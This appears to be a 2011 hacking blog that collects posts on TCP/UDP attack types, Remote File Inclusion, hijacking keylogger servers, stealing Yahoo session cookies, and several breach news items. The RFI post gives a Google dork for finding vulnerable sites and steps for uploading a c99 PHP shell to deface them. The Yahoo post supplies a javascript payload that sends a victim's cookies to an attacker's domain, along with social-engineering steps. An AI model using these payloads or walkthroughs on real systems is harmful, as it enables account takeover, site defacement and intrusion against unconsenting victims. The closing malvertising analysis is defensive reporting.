Tuesday, 26 April 2011

What is TCP/IP & UDP Attacks ?

Hello, Lets explain "TCP/IP & UDP Attacks", Most common and effective Web attacks...Lets Know abt its basic and types...

TCP/IP Attacks
1. TCP SYN or TCP ACK Flood Attack
2. TCP Sequence Number Attack
3. TCP/IP UDP attacks

UDP attacks
1. ICMP Attacks
2. Smurf Attacks
3. ICMP Tunneling

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server, these ACK packets tells the server that a connection is requested. The server thus responds to the client with a ACK packet, the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually send and receives the ACK packets but it does not open the session. The server holds these sessions open, awaiting the final packet in the sequence. This cause the server to fill up the available connections and denies any requesting clients access.

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end of the network
for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent the client or the server generates a sequence number. The attacker intercepts and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense of such an attack is to know that its occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing, it involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus it can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - This occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping for instance, that uses the ICMP protocol. sPing is a good example of this type of attack, it overloads te server with more bytes than it can handle, larger connections. Its ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it send back ICMP message traffic information indicating status to the originator. If a broadcast is sent to network, all hosts will answer back to the ping. The result is an overload of network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The counter measure is to deny ICMP traffic on your network.

Warning : ICMP can be very dangerous..and Even,as i said ...Don't try such attack from your pc,untill you don't know that how to be invisible on net ! Beccause once you get traced out ...No one can help you from Troubles..

Thankyou,

What is Remote File Inclusion (RFI) Web Hacking ?

Hey friends...Now we will know about Website hacking method "Remote File Inclusion (RFI)" . This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.This ICA article is for Educational Purpose Only...so please Use this for knowledge Only !


This articles will be unserstandable mostly by web developers,or how know some web programming in html,php,asp etc...Lets start..


Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.


Normally, I'm against stuff like this. I believe people should find their own vulnerablesites. But, for the sake of this paper, i will show you how we can use google to get us vulnerable sites.


We will query google like so:

     inurl:"index.php?page="
This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.

    www.site.com/index.php?page=www.google.com
It is not nessesry that every site will work loke above statement....Only those will redirect to google,which having the security holes...
If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of a RFI:
this is an example only,There is no such sites or file....

      www.shittysite.com/index.php?page=www.theevilhackerz.com/shell.txt


A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable hosts url, like the example above.
D) You can then proceed to deface the site etc.


If you have any question or query  ,the feel free to ask..Post a comment here !
Thankyou,

Decode Keyloggers and Stealers - Get passwords of Hackers !


Hello, here method to hack the hackers..If you have a keylogger on your computer, and you know the file, this process will easily give you the FTP website they are using so you can get the logs for the files, and if they use the same keyloggers on other computers, you’ll get the logs for that to.

What is Reverting ?
Reverting generally means reversing an action or undoing the changes. Here in our case, reverting would be more of reversing the action. For this we will need a key logger server using ftp. It can be found on warez sites, you tube etc.

Tools needed:
1) Key logger, pass stealer
2) Cain and Abel
3) Virtual machine (so you don't get infected, and what if the hacker is using better protocol that'd be epic fail)

Follow the Following Steps.....
1.) Execute the key logger on your virtual machine.

2.) Now run Cain and Abel and do the following things as per stated order.


3.) Wait for sometime and then check back the passwords area.
4







4

4.) As you can see the key logger used ftp protocol to transfer the logs. Ftp protocol isn't very safe since it doesn't encrypt the data. Anyways you should see the ip address where your pc is sending packets. And also the user name and password. This might not work if the server is using other protocol like http smtp etc you'll most probably get junk values in user and pass box if those protocols are used.

So i open the ip address http://66.220.9.50/






5.) Now you have username and pass from "Cain and Abel" ... So Login and Hit The Hacker !!!!
Hope that ,this article will be helpful for you, now go and collect all viruses and try this method... Hope u will get good Results..

Indian Cyber Army (Reg.) Celebrating "Republic Day 2011" Together on Facebook !


Indian Cyber Army (Reg.) Celebrating 
"Republic Day 2011" Together on Facebook !!


Indian Cyber Army (http://www.indiancyberarmy.org/ ) was registered in Jan 2011 under govt. Indian Cyber Army is leading three most important departments of cyber world.
Read Complete post here....

More than 1000+ Facebook Users Using The below Picture as there Profile pic , to Celebrating"Republic Day 2011" Together on Facebook !!

We have target to cover 10000 Facebook profiles till 26th January !! Please Keep the below image as your profile picture at-least till 31st jan-2011 .

Become the part of this Event :
Step 1 : "Save as Image" Below image in your computer.

Step 2 : Now upload the image as your new Facebook profile Picture !!

Done !! Thank you !!
If you have any query then Join n ask Us : Click Here

Hack Yahoo Accounts with Sessions Ids and Session Cookies !

Hello Friends, This is an Guest post By Mr. Aneesh M. Makker admin of http://www.explorehacking.com/ on "Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Indian Institute of Management (IIM-B) Bangalore website hacked

Indian Institute of Management (IIM-B) Bangalore website hacked

The website of the Indian Institute of Management-Bangalore has been hijacked by hackers peddling erectile dysfunction products like Viagra. The website, www.iimb.ernet.in, has been out of service for at least ten days.

Cached versions of its home page during the period show the IIM masthead is superceded by ads for purchasing Viagra online without prescriptions.

Yahoo! PH Purple Hunt 2.0 Ad Compromised !


Yahoo! PH Purple Hunt 2.0 Ad Compromised !

Earlier the other day, I was browsing through the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and surprisingly my browser downloaded a suspicious file named com.com.

Apparently this ad redirected me to a randomly generated URL similar to the following which, unfortunately, led to the malicious download:

hxxp://want6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69
c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
13b801ba978269fcda413f53e/960b0a2a/com.com
hxxp://nose8.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c
09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
13b801ba978269fcda413f53e/960b0a2a/com.com
hxxp://letter6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c0
9b8d3198b2797726789be0228c0f3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13
b801ba978269fcda413f53e/785c08d8/com.com

Below is a screenshot of the file download dialog box:
The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

Firstly, the download only happens once per browser, which means that the malvertisement may have used an IP and user agent filtering of some sort to prevent multiple downloads which would make it suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.
It appears that the advertisement is first redirected to the malware download before it finally brings the browser to the real advertisement page. The redirection follows this format for the download link:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.